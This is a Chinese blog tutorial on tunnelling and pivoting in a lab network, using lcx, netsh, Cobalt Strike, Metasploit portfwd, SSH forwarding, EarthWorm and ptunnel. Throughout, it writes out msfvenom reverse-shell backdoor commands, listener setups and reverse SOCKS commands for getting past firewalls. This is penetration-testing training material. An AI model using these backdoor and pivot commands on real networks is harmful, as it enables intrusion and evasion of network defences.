主頁 >  其他 > 流量操縱——隧道

流量操縱——隧道

2022-01-05 20:59:21 其他

目錄

  • 介紹
    • 1. 什么是隧道?
    • 2. 為什么使用隧道?
    • 3. 常用的隧道協議有哪些?
    • 4. 隧道與代理的區別
    • 5. 腦圖概覽
  • 埠轉發
  • nc
  • lcx
    • 環境拓撲
    • 實操
  • netsh
    • 環境拓撲
    • 實操1
    • 實操2—MSF
  • cobalt strike正向連接內網
    • 環境拓撲
    • 準備階段
    • 實操
  • cobalt strike反向連接內網
    • 環境拓撲
    • 實操
  • Metasploit Portfwd(埠轉發/重定向)
    • 環境拓撲
    • 準備階段
    • 實操
      • 轉發win2012的遠程桌面
      • 轉發win7的遠程桌面
      • 訪問win7的80埠
  • SSH
    • SSH埠轉發的兩大功能
    • SSH本地socks5代理
    • SSH本地埠轉發
    • SSH遠程埠轉發
  • EarthWorm(EW)
    • 正向代理
    • 反向代理
  • ICMP隧道-Ptunnel
    • 環境準備
    • 實操
  • DNS隧道-dns2tcp
    • DNS隧道介紹
    • dns2tcp介紹
    • 實操
  • 參考

介紹

1. 什么是隧道?

在實際的網路中,通常會通過各種邊界設備、軟/硬體防火墻甚至入侵檢測系統來檢查對外連接情況,如果發現異樣,就會對通信進行阻斷,那么什么是隧道呢?這里的隧道,就是一種繞過埠屏蔽的通信方式,防火墻兩端的資料包通過防火墻所允許的資料包型別或埠進行封裝,然后穿過防火墻,與對方進行通信,當封裝的資料包到達目的地時,將資料包還原,并將還原后的資料包發送到相應服務器上,
?

在一些網路環境中,如果攻擊者使用各類上層隧道(例如HTTP隧道,DNS隧道,正反向埠轉發等)進行操作均失敗,那么可以嘗試使用ICMP建立隧道,ICMP協議不需要埠的開放,因為其基于IP作業的,所以我們將其歸結到網路層,ICMP訊息最為常見的就是ping命令的回復,將TCP/UDP資料包封裝到ICMP的ping資料包中,從而穿過防火墻(通常防火墻是不會屏蔽ping資料包的)
?

防火墻只允許ping出站流量,利用ptunnel建立ICMP隧道,從而實作傳輸資料,

2. 為什么使用隧道?

在資料通信被攔截的情況下利用隧道技術封裝改變通信協議進行繞過攔截,解決CS、MSF無法上線,資料傳輸不穩定無回顯,出口資料被監控,網路通信存在問題等,

3. 常用的隧道協議有哪些?

網路層:IPv6 隧道、ICMP 隧道
傳輸層:TCP 隧道、UDP 隧道、常規埠轉發
應用層:SSH 隧道、HTTP/S 隧道、DNS 隧道

4. 隧道與代理的區別

代理是為了解決網路通訊問題,如:我在學校,如何連接在網吧的你?我在中國,如何訪問油管?
隧道在代理之上,在建立連接的情況下,如何突破各種網路限制,來建立穩固連接

5. 腦圖概覽

在這里插入圖片描述

埠轉發

埠映射與埠轉發用于發布防火墻內部的服務器或者防火墻內部的客戶端計算機,有的路由器也有埠映射與埠轉發功能,埠映射與埠轉發實作的功能類似,但又不完全一樣,埠映射是將外網的一個埠完全映射給內網一個地址的指定埠,而埠轉發是將發往外網的一個埠的通信完全轉發給內網一個地址的指定埠,埠映射可以實作外網到內網和內網到外網雙向的通信,而埠轉發只能實作外網到內網的單向通信,

隧道與埠轉發的概念不是很清晰,這里參考:https://hsk.oray.com/news/9757.html

nc

關于nc,參見我之前的文章:https://blog.csdn.net/weixin_44288604/article/details/112888661
關于反彈sehll,參見我之前的文章:https://blog.csdn.net/weixin_44288604/article/details/111740527

lcx

最原始的lcx找不著了,在github上搜索,表現較好的是下面這個
專案地址:https://github.com/cw1997/NATBypass
?

資源串列如下,下載64位的
在這里插入圖片描述

實驗目標:kali獲取內網主機的3389

環境拓撲

  1. win7開啟3389遠程桌面
  2. 分別在win7和win2008上運行lcx

在這里插入圖片描述

實操

  1. win7執行如下命令

把自己127.0.0.1的3389轉發到192.168.42.129的6666埠

.\nb-windows-amd64.exe -slave 192.168.42.129:6666 127.0.0.1:3389

在這里插入圖片描述

  1. win2008執行如下命令

把6666埠的流量轉發到7777埠

.\nb-windows-amd64.exe -listen 6666 7777

在這里插入圖片描述

  1. kali連接win7的3389

kali連接192.168.40.131:7777相當于連接192.168.40.131:6666,相當于192.168.42.128:3389

rdesktop 192.168.40.131:7777

在這里插入圖片描述

輸入正確是賬號密碼即可連接
在這里插入圖片描述

netsh

netsh是windows系統自帶的一個命令列工具,這個工具可以內置埠轉發功能

環境拓撲

在這里插入圖片描述

實操1

實作:當kali訪問win2012的某埠時,可以訪問到內網win7的某埠,
演示:當kali訪問win2012的6666埠時,可以訪問到內網win7的3389埠,

win2012只需要設定為:允許任意主機訪問自己的6666埠時,自己就把流量轉發給win7的3389埠

  1. 開啟埠轉發,命令如下:
添加埠轉發的命令
netsh interface portproxy add v4tov4 listenport=6666 connectaddress=192.168.195.138 connectport=3389

查看埠轉發的記錄表
netsh interface portproxy show all

清除指定規則
netsh interface portproxy delete v4tov4 listenport=6666

清除所有規則
netsh interface portproxy reset

在這里插入圖片描述

  1. 訪問內網機器

在這里插入圖片描述

實操2—MSF

實驗思路:

  1. msfvenom生成后門,一旦運行,就自動訪問win2012的4444埠
  2. win2012開啟埠轉發,只要有人連接自己的6666埠,就轉發給kali的4444埠
  3. kali監聽4444埠

不知道為什么,這個實驗沒做出來,重置了一下網路,新的網路拓撲如下圖
后續:經過排查得知,是因為win2012開啟了防火墻,導致實驗失敗,關閉防火墻即可,

在這里插入圖片描述

操作:

  1. msfvenom生成后門
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.128 lport=6666 -f exe >s.exe
  1. win2012開啟埠轉發
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=192.168.239.141 connectport=4444

在這里插入圖片描述

  1. kali開啟監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.239.141
set lport 4444
exploit
  1. 運行木馬
  2. 拿到session

在這里插入圖片描述

cobalt strike正向連接內網

實驗目標:已經使用cs拿下win2012,如何把win2012作為跳板機去訪問目標win7

環境拓撲

在這里插入圖片描述

準備階段

  1. 啟動CS服務器

在這里插入圖片描述

  1. 啟動CS客戶端

雙擊start.bat就行了

  1. 生成payload,讓代理服務器win2012上線

這部分的操作,簡單截個圖算了,詳情參見之前的筆記:語雀地址、CSDN地址
3.1 設定監聽器
在這里插入圖片描述

3.2 生成powshell
在這里插入圖片描述

3.3 主機上線
在這里插入圖片描述

實操

  1. 新建一個tcp的監聽器

在這里插入圖片描述

  1. 生成exe后門

在這里插入圖片描述

  1. 把后門丟到win7上,目標win7運行后門

果然開放了4444埠,那么我們只需要通過win2012即可正向連接到win7
在這里插入圖片描述

  1. 連接win7

注意,ip和埠之間是沒有冒號的,否則會失敗

connect 10.10.1.129 4444

在這里插入圖片描述

cobalt strike反向連接內網

如果內網靶機有防火墻進行攔截,那么正向連接就會失敗,為了解決這個問題,就需要使用反向連接,
即:讓內網目標win7反向連接代理服務器win2012

環境拓撲

在這里插入圖片描述

實操

  1. 生成監聽器

在這里插入圖片描述

  1. 生成后門

在這里插入圖片描述

  1. win7運行后門,后門就會主動連接到win2012,cs就會得到win2012的新會話

不知道錯誤原因,先不管了,
在這里插入圖片描述

  1. 重置了一下網路,再來操作一遍,發現是第2步中需要指定X64才行

在這里插入圖片描述

Metasploit Portfwd(埠轉發/重定向)

環境拓撲

在這里插入圖片描述

準備階段

先拿下win2012

  1. msf生成后門
msfvenom -p windows/meterpreter/reverse_tcp lport=4455 -f exe >hack.exe
  1. msf開啟監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.239.141
set lport 4455
exploit
  1. 把后門丟到win2012,運行它

在這里插入圖片描述

實操

轉發win2012的遠程桌面

  1. 開啟win2012的遠程桌面
  2. 添加埠轉發
portfwd add -l 8080 -r 192.168.239.201 -p 3389

在這里插入圖片描述

  1. 實作:訪問本地的8080埠時,訪問到win2012的3389埠

在這里插入圖片描述

轉發win7的遠程桌面

需要確認win7開啟了3389,否則不能直接搞,

meterpreter > portfwd add -l 5566 -r 10.10.10.131 -p 3389

在這里插入圖片描述

訪問win7的80埠

實作通過訪問本地的4477埠,訪問到了win7的80埠

portfwd add -l 4477 -r 10.10.10.131 -p 80

在這里插入圖片描述

方式1:訪問 http://localhost:4477
在這里插入圖片描述

方式2:訪問 http://192.168.239.141:4477
在這里插入圖片描述

方式3:可以直接使用BurpSuite
在這里插入圖片描述

SSH

SSH會自動加密和解密所有SSH客戶端與服務端之間的網路資料,但是,SSH還能夠將其他TCP埠的網路資料通過SSH鏈接來轉發,并且自動提供了回應的解密服務,這一程序也被叫做“隧道”(tunneling),這是因為SSH為其他TCP鏈接提供了一個安全的通道來進行傳輸而得名,例如SMTP、LDAP這些TCP應用均能夠從中得益,避免了用戶名,密碼以及隱私資訊的傳輸,而此同時,如果作業環境中的防火墻限制了一些網路埠的使用,但是允許SSH的連接,也能夠通過將TCP埠轉發來使用SSH進行通訊,

SSH埠轉發的兩大功能

  • 加密SSH_Client端至SSH_Server端之間的通訊資料,
  • 突破防火墻的限制,完成一些之前無法建立的TCP連接,

SSH本地socks5代理

在這里插入圖片描述

實作思路:kali連接一臺aws的云服務器,通過它訪問互聯網,突破網路限制,

  1. 給root設定一個密碼
  2. 編輯ssh檔案:vim /etc/ssh/sshd_config
  3. PasswordAuthentication no修改為PasswordAuthentication yes
  4. 添加:PermitRootLogin yes
  5. 重啟ssh服務:service sshd restart
  6. 以賬號密碼的方式連接云服務器的ssh,如下圖:ssh -qTfnN -D 7070 root@3.112.252.229
-C 為壓縮資料
-q 安靜模式
-T 禁止遠程分配終端
-n 關閉標準輸入
-N 建立靜默連接,就是建立了連接(不執行登錄shell)
-f 將SSH傳輸放在后臺執行
-D 動態轉發

在這里插入圖片描述

  1. 給kali的瀏覽器配置一個socks5代理

在這里插入圖片描述

  1. 使用此socks代理,就可以訪問外網了,

在這里插入圖片描述

在這里插入圖片描述

SSH本地埠轉發

關于這部分更細致的記錄,參見之前的筆記:語雀地址、CSDN地址

在這里插入圖片描述

實作:kali能透過Cent7訪問到內網win7的web服務
在kali上執行如下命令:

ssh -L 本地埠:目標IP:目標埠 root@192.168.40.150 -fN
ssh -L 6666:10.10.10.128:80 root@192.168.40.150 -fN

-f 將SSH傳輸放在后臺執行
-N 建立靜默連接,就是建立了連接(不執行登錄shell)

在這里插入圖片描述

實作:kali能透過Cent7連接win7的遠程桌面

ssh -L 7777:10.10.10.128:3389 root@192.168.40.150 -fN
rdesktop 10.10.10.128:3389

在這里插入圖片描述

SSH遠程埠轉發

kali希望能訪問到ubuntu的80埠,但是Cent7和ubuntu之間只允許3306埠通信,如何解決?
在這里插入圖片描述

  1. 將跳板機Cent7的ssh組態檔:/etc/ssh/sshd_config中的GatewayPorts修改為yes,沒有的話添加此項內容,之后重啟SSH,

這個配置的作用是,遠程轉發后將127.0.0.1改為0.0.0.0,攻擊者kali就可以通過指定埠就能訪問內網的ubuntu
在這里插入圖片描述

  1. Ubuntu開啟遠程埠轉發

實作,任何機器只要連接了跳板機的8866埠,就能轉發到Ubuntu的80埠

ssh -R 8866:10.10.10.131:80 root@10.10.10.130 -fN

在這里插入圖片描述

  1. 外網的kali可以訪問內網的Ubuntu

在這里插入圖片描述

EarthWorm(EW)

EW 是一套便攜式的網路穿透工具,具有 SOCKS v5服務架設和埠轉發兩大核心功能,可在復雜網路環境下完成網路穿透,目前工具已經停止更新(此工具被查殺嚴重),使用方法在下面的鏈接中作者已經介紹了,可以參考
下載地址:https://github.com/idlefire/ew
官方網站:http://rootkiter.com/EarthWorm
?

引數如下:

-s   選擇功能型別:
  共包含6種功能:      
      ssocksd:正向代理       
      rcsocks:反向代理1,流量轉發       
      rssocks:反向代理2,反彈socks5       
      lcx_listen:反向代理1,流量轉發       
      lcx_tran:埠轉發       
      lcx_slave:埠系結 
-l   指定要監聽的本地埠  
-d   指定要反彈到的機器 ip 
-e   指定要反彈到的機器埠 
-f   指定要主動連接的機器 ip 
-g   指定要主動連接的機器埠 
-t   指定超時時長,默認為1000

正向代理

環境拓撲如下,kali希望訪問到內網vm2
思路:win2012開啟代理,只有有人連接了自己的9999埠,自己就把它轉發走
在這里插入圖片描述

  1. win2012開啟代理
ew_for_Win.exe -s ssocksd -l 9999  //在9999埠上開啟socks代理,ssocksd提供正向代理功能

在這里插入圖片描述

  1. kali修改socks代理檔案

在這里插入圖片描述

  1. kali訪問內網Ubuntu的80埠

在這里插入圖片描述

反向代理

環境拓撲如下,kali希望訪問到內網vm2
思路:win7開啟反向代理,反彈socks5到win2012,win2012開啟反向代理,連接win7,再流量轉發功能
在這里插入圖片描述

  1. win2012開啟代理轉發(第一步先做這個,如果先做win7會導致win7反彈失敗!)
ew_for_Win.exe -s rcsocks -l 1080 -e 1024

在這里插入圖片描述

  1. win7開啟反向代理,反彈socks5到win2012
ew_for_Win.exe -s rssocks -d 10.10.10.129 -e 6666

在這里插入圖片描述

  1. kali配置代理

在這里插入圖片描述

常見埠掃描也是可以的

proxychains4 nmap -Pn -sT -sV 10.10.10.128 -F

在這里插入圖片描述

ICMP隧道-Ptunnel

如果用戶可以ping通遠程計算機,就可以嘗試建立ICMP隧道,將TCP資料通過該隧道發送,實作不受限的網路訪問,
引數:

-p    代理服務器地址,即跳板機地址
-lp   本地埠
-da   目標內網IP,即我們的目標機IP
-dp   目標埠,即我們要的目標機埠
-c    網卡編號
-v    顯示詳細程序,值可以-1-5,-1為不顯示,5為最詳細
-udp  通過dns協議傳輸,埠為udp53
-x    進入此隧道密碼,如果服務器加該引數,客戶端也需要加同樣引數和值
-f    指定一個日志檔案

網路拓撲如下,攻擊者想要實作和目標之間自由通信(目前只能實作ICMP互通)
在這里插入圖片描述

環境準備

  1. 目標使用iptables防火墻,不接收來自攻擊者的tcp型別資料包
iptables -F //清除規則
iptables -A INPUT -p tcp -s 192.168.40.129 -j DROP	//添加規則
iptables -L //查看規則

在這里插入圖片描述

  1. 目標開啟一個web服務,用來進行測驗

在這里插入圖片描述

  1. 測驗如下

代理可以正常訪問
在這里插入圖片描述

攻擊者訪問失敗
在這里插入圖片描述

實操

  1. 代理主機生成一個隧道
sudo ptunnel -x 1234

在這里插入圖片描述

  1. 攻擊者透過代理主機的隧道,連接到目標的80埠
sudo ptunnel -p 192.168.40.140 -lp 8080 -da 192.168.40.139 -dp 80 -x 1234

在這里插入圖片描述

在這里插入圖片描述

DNS隧道-dns2tcp

DNS隧道介紹

什么是DNS隧道?
DNS隧道(DNS Tunneling)是將其他協議的內容封裝在DNS協議中,然后以DNS請求和回應包完成傳輸資料(通信)的技術,當前網路世界中的DNS是一項必不可少的服務,所以防火墻和入侵檢測設備處于可用性和用戶友好的考慮大都不會過濾DNS流量,也為DNS成為隱蔽信道創造了條件,因此,DNS隧道在僵尸網路和APT攻擊中扮演著重要的角色,
?

DNS隧道的原理
在進行DNS查詢時,如果查詢的域名不在DNS服務器本機的快取中,就會訪問互聯網進行查詢,然后回傳結果,如果在互聯網上有一臺定制的服務器那么依靠DNS協議即可進行資料包的交換,從DNS協議的角度看,這樣的操作只是在一次次查詢某個特定的域名并得到決議結果,但其本質問題是,預期的回傳結果應該是一個IP地址,而事實上不是——回傳的可以是任意字串,包括加密的C&C指令,
?

DNS隧道分為兩種
直連模式:客戶端直接向指定IP地址的DNS服務器發起DNS決議請求
中繼模式:DNS經過互聯網的迭代決議,指向指定的DNS服務器,
?

區別在于直連模式速度相對快,但安全性相對較差,非直連模式速度相對較慢,但安全性相對較高,大多數情況下都使用中繼模式,
(另外直連方式的限制比較多,如目前很多的企業網路為了盡可能的降低遭受網路攻擊的風險,一般將相關策略配置為僅允許與指定的可信任DNS服務器之間的流量通過,)

dns2tcp介紹

dns2tcp是一個利用DNS隧道轉發TCP連接的工具,支持KEY和TXT型別的請求,用C語言開發,它分為兩個部分,服務端和客戶端,服務端運行在inux服務器上,客戶端可以運行在linx和 windows上(其他平臺沒有測驗過),編譯完成后在服務端上的可執行檔案名稱為dns2tcp,在客戶端(linux)上的名稱為dns2tcpc,kali默認安裝了二者,下述為主要引數及解釋,詳情請參考手冊,

實操

需要搞個vps就算了,還得搞個域名,太麻煩,操作參見他人的文章吧:https://blog.csdn.net/smli_ng/article/details/106159155

參考

【內網滲透】搭建隧道
安全攻防 | EarthWorm 代理
ICMP隧道技術
內網隱藏通信隧道技術——DNS隧道

?

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/403895.html

標籤:其他

上一篇:在Python/pandas中格式化每月日期

下一篇:為什么 HTTPS 比 HTTP 更安全?HTTPS 如何保證資料傳輸安全性

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more